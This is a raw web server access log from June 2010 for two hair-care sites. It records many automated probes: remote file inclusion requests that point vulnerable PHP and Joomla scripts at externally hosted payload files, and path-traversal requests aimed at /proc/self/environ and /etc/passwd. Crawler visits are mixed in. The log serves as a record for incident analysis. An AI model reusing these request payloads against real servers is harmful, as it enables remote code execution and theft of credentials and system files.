95.215.0.123 - - [20/Jun/2010:23:15:09 -0700] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:15:19 -0700] "GET /logs/access_100405.log//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:17:02 -0700] "GET /bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.216.242.123 - - [20/Jun/2010:23:18:10 -0700] "GET /logs/access_100208.log////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:23:19:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:23:19:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:19:09 -0700] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:19:09 -0700] "GET /logs/access_100215.log%20%20//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:19:19 -0700] "GET /logs/access_100405.log%20%20//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.142.214.148 - - [20/Jun/2010:23:19:39 -0700] "GET /logs///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 6092 "-" "libwww-perl/5.805" "www.growlonghairfast.com"
94.136.63.119 - - [20/Jun/2010:23:19:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.freehairsecrets.com"
94.136.63.119 - - [20/Jun/2010:23:19:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.freehairsecrets.com"
91.142.214.148 - - [20/Jun/2010:23:19:44 -0700] "GET //?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.growlonghairfast.com"
91.201.66.11 - - [20/Jun/2010:23:19:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.201.66.11 - - [20/Jun/2010:23:19:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.142.214.148 - - [20/Jun/2010:23:23:32 -0700] "GET /logs/access.log///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.142.214.148 - - [20/Jun/2010:23:23:33 -0700] "GET //?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.142.214.148 - - [20/Jun/2010:23:23:33 -0700] "GET /logs///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 6092 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:25:26 -0700] "GET /logs/access_100215.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:25:26 -0700] "GET /bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:25:27 -0700] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:26:02 -0700] "GET /logs/access_100215.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:26:02 -0700] "GET /bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:26:02 -0700] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:27:35 -0700] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:27:35 -0700] "GET /bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:27:35 -0700] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:27:40 -0700] "GET /logs/access_100405.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:27:46 -0700] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:27:46 -0700] "GET /bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [20/Jun/2010:23:27:47 -0700] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
91.121.208.42 - - [20/Jun/2010:23:28:24 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
95.215.0.123 - - [20/Jun/2010:23:28:35 -0700] "GET /logs/access_100405.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
74.124.198.61 - - [20/Jun/2010:23:29:14 -0700] "GET /spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.61 - - [20/Jun/2010:23:29:14 -0700] "GET /logs/access.log%20%20//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.61 - - [20/Jun/2010:23:29:14 -0700] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.208.42 - - [20/Jun/2010:23:29:15 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
64.8.98.179 - - [20/Jun/2010:23:29:19 -0700] "GET /logs/access.log%20%20//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.8.98.179 - - [20/Jun/2010:23:29:19 -0700] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.8.98.179 - - [20/Jun/2010:23:29:19 -0700] "GET /spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:23:31:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14354 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
203.120.246.20 - - [20/Jun/2010:23:33:07 -0700] "GET /logs/access_100531.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:23:33:08 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:23:33:08 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:23:33:16 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
203.120.246.20 - - [20/Jun/2010:23:33:17 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
203.120.246.20 - - [20/Jun/2010:23:33:18 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
64.8.98.179 - - [20/Jun/2010:23:34:01 -0700] "GET /logs/access.log//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:23:34:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13358 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
66.249.65.234 - - [20/Jun/2010:23:35:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:23:45:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14331 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.121.208.42 - - [20/Jun/2010:23:48:31 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [20/Jun/2010:23:48:31 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [20/Jun/2010:23:48:31 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [20/Jun/2010:23:50:03 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.208.42 - - [20/Jun/2010:23:50:03 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.208.42 - - [20/Jun/2010:23:50:03 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.195.37.176 - - [20/Jun/2010:23:52:02 -0700] "GET /tmp/mailError.log HTTP/1.0" 200 62167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
114.108.128.56 - - [20/Jun/2010:23:52:11 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:23:54:52 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.234.100.196 - - [20/Jun/2010:23:55:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
211.234.100.196 - - [20/Jun/2010:23:55:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
211.234.100.196 - - [20/Jun/2010:23:55:52 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
211.234.100.196 - - [20/Jun/2010:23:55:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:00:05:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13153 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:00:06:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13287 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.218.116.171 - - [21/Jun/2010:00:07:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
67.15.152.183 - - [21/Jun/2010:00:07:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:09:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:09:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:00:11:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [21/Jun/2010:00:11:41 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:00:14:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13835 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.28.0.233 - - [21/Jun/2010:00:18:51 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.freehairsecrets.com"
195.28.0.233 - - [21/Jun/2010:00:18:51 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:20:12 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:20:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:20:12 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:00:22:44 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:00:22:45 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
114.108.128.56 - - [21/Jun/2010:00:22:45 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
67.195.114.238 - - [21/Jun/2010:00:24:03 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
95.156.233.139 - - [21/Jun/2010:00:25:55 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
95.156.233.139 - - [21/Jun/2010:00:25:56 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
95.156.233.139 - - [21/Jun/2010:00:25:56 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:00:28:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13798 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:00:35:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:00:35:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:38:56 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:38:56 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:38:56 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:39:16 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:39:16 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:00:39:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:23 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:23 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:25 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:28 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:28 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:42:28 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:00:45:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13758 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
95.215.0.123 - - [21/Jun/2010:00:45:08 -0700] "GET /logs/access_100222.log//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:00:45:14 -0700] "GET /logs/access_100426.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:45:14 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:45:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:45:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:45:20 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:45:20 -0700] "GET /logs/access_100426.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:00:45:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18772 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.15.152.183 - - [21/Jun/2010:00:45:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
62.43.194.164 - - [21/Jun/2010:00:46:40 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.43.194.164 - - [21/Jun/2010:00:46:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.43.194.164 - - [21/Jun/2010:00:46:41 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.43.194.164 - - [21/Jun/2010:00:46:41 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.43.194.164 - - [21/Jun/2010:00:46:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.43.194.164 - - [21/Jun/2010:00:46:41 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.249.199.195 - - [21/Jun/2010:00:49:20 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
